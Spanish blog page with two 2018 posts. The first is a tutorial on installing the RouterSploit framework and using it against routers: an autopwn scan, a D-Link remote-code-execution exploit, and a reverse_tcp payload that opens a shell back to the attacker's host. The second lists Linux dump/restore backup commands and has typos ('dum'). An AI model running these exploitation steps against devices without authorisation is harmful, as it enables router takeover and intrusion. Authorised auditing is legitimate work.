miércoles, 24 de octubre de 2018

Análisis de Vulnerabilidades de un Router

Ahorita realizaremos un análisis de vulnerabilidades de los routers de nuestra organización, para ello utilizaremos un Framework Open Source de seguridad llamado RouterSploit, con el se puede realizar auditoria de distintos dispositivos como routers, webcam, equipos NAS, entre otros.

Este framework contiene 5 módulos, que son los siguientes:
1. exploit
2. creds
3. scanners
4. payloads
5. generic

Su función es la siguiente:
1. exploits: Este módulos que aprovechan las vulnerabilidades identificadas.
2. creds: El módulos creds es para probar credenciales en los servicios de red.
3. scanners: Con este módulos se verifica si un objetivo es vulnerable a cualquier exploit.
4. payloads: módulos para generar cargas útiles en diversas arquitecturas.
5. generic: módulos que realizan ataques genéricos.

Ya que conocemos los modulos vamos a proceder a realizar la instalación

Instalación

Para un correcto funcionamiento de RouterSploit se necesita instalar los siguientes paquetes:

- future
- requests
- paramiko
- pysnmp
- pycrypto
- bluepy (opcional)

#apt install future requests paramiko pysnmp pycrypto

Ahora se procede a la instalación de pip en Python3

#apt install python3-pip

Clonación del RouterSploit 

git clone https://www.github.com/threat9/routersploit

Nos posicionamos en él directorio.

Una vez que se descomprime el archivo descargado entramos en la carpeta


cd routersploit

Instalamos los requisitos.


python3 -m pip install -r requirements.txt

Ejecución de RouterSploit

python3 rsf.py

Como usar RouterSploit

Para comenzar a utilizar el RouterSploit debes conocer la ip de los dispositivos que vas auditar 

Comandos iniciales


Una vez que se inicia el RouterSploit, se procede a seleccionar el modulo scanner con autopwn (Esto lanzara todos los exploit contra el objetivo)

use scanner/autopwn


Luego se procede a marcar el objetivo


set target [IP-DISPOSITIVO]

Se procede a realizar el attack del dispositivo 

Colocamos el siguiente comando
run

Una vez finalizado el chek del dispositivo mostrara si posee vulnerabilidades y cual es el exploits para esa vulnerabilidad, para esto se debe utilizar los siguientes comando

Comando use exploits/routers/marca_routers/codigo_exploits

Uso del exploit para el objetivo
use exploits/routers/dlink/dls_2750b_rce

Comando para colocar exploits en el objetivo
set target ip

Ejemplo


set target 192.168.1.1

Verificamos la vulnerabilidad del objetivo check

Atacamos run

Consultamos la carga realizada show payloads

Colocamos el payloads reverse_tcp y consultamos las opciones
set payloads reverse_tcp
show options

Cargamos la ip del host donde queremos hacer el ataque
set lhost 192.168.1.10

Atacamosrun

Una vez listo podemos colocar un pwd o ls y listamos los directorios

Posteriormente salimos
exit

Como actualizar RouterSploit

Nos ubicamos en el directorio

cd routersploit

Una vez en el directorio realizamos un pull para actualizar los paquetes
git pull

lunes, 1 de octubre de 2018

Como crear Backup en Linux

Como crear Backup en Linux


Cuando se administran plataformas se deben tener políticas que permitan mantener el resguardo total de la data, políticas de respaldos diarios ya que no sabemos si problemas graves afecten la información en producción

Para esto hay comandos como los siguientes para realizar el respaldo y la restauración de la misma

Sintaxis para realizar Backup en Linux

Permite guardar el directorio completo
dum -0aj -f /ruta-donde-se-guardara-el-respaldo.bak: /ruta-del-respaldo

Permite guardar el directorio incremental
dum -1aj -f ruta-donde-se-guardara-el-respaldo.bak: /ruta-del-respaldo

Permite restaurar el backup creado interactivamente
restore -if /ruta-donde-se-restaurara-el-respaldo.bak:

Ejemplo de como realizar Backup en Linux

Permite guardar el directorio WWW completo 
dump -0aj -f /var/www.bak /www: hacer una salva completa del directorio ‘/www’.

Permite guardar el directorio WWW incremental
dump -1aj -f /var/www.bak /www: hacer una salva incremental del directorio ‘/www’.

Permite restaurar el backup creado interactivamente
restore -if /var/www.bak: restaurando una salva interactivamente.